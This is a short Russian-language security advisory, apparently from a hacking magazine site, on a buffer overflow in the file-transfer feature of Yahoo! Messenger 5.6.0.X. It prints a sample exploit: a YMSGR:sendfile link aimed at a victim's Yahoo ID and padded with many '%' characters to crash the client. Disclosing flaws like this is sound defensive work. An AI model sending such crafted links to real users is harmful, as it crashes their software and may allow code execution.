Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: Yahoo! Messenger version 5.6.0.X
Переполнение буфера обнаружено в Yahoo! Messenger. Удаленный пользователь может аварийно завершить работу уязвимого клиента.
Переполнение обнаружено в Yahoo Messenger File Transfer опции. Удаленный атакующий может послать специально обработанное имя файла, чтобы аварийно завершить работу целевого клиента. Возможно уязвимость может использоваться для выполнения произвольного кода.
Пример/Эксплоит:
YMSGR:sendfile?[victim_yahooID]+ %%%%%%%%%%%%%%%%%% %%%%%%%%%%%%% %%%%%%%
%%%%%%%%%%%% %%%%%%%%%%%%% %%%%%%%% %%%&c%c:\[somefile]
(больше 73 символов %)